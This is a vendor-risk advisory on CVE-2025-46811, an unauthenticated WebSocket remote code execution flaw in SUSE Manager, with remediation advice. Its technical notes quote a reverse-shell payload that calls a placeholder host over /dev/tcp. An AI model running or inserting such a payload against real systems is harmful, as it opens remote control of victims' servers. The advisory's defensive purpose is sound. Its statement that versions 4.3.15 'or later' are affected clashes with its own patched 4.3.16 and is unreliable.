Remote Code Execution Vulnerability (CVE‑2025‑46811) in SUSE Manager 4.3.15 Allows Attackers to Deploy Reverse Shells
What Happened – A publicly‑available exploit (EDB‑52527) targets CVE‑2025‑46811 in SUSE Manager 4.3.15 (and Uyuni 2025.05, SUSE Manager 5.0.4). The flaw resides in an unauthenticated WebSocket endpoint that accepts a crafted payload, resulting in remote code execution and a reverse‑shell back‑door.
Why It Matters for TPRM –
- The affected component is a core management interface used by many MSPs and internal IT teams, exposing the risk of a full‑system compromise.
- Successful exploitation can give attackers unrestricted access to the management server, enabling lateral movement into customer environments.
- The vulnerability is actively exploitable and has a public exploit script, raising the likelihood of real‑world attacks.
Who Is Affected – Enterprises that run SUSE Manager 4.3.15 or later, MSPs offering SUSE‑based services, and any downstream customers whose infrastructure is managed through the compromised console.
Recommended Actions –
- Verify whether any managed assets run the vulnerable versions; if so, upgrade to the patched release (SUSE Manager 4.3.16 or later).
- Apply network‑level segmentation: block external access to the WebSocket endpoint (port 443/9001) unless required.
- Conduct a thorough review of logs for unexpected WebSocket connections and potential reverse‑shell activity.
Technical Notes – The exploit sends a reverse‑shell payload (sh -i >& /dev/tcp/HOST_IP/HOST_PORT 0>&1) over a WebSocket connection, optionally over TLS. No authentication is required, making it a classic unauthenticated RCE via a vulnerable web‑application component. CVE‑2025‑46811 is rated Critical by the vendor. Source: Exploit‑DB 52527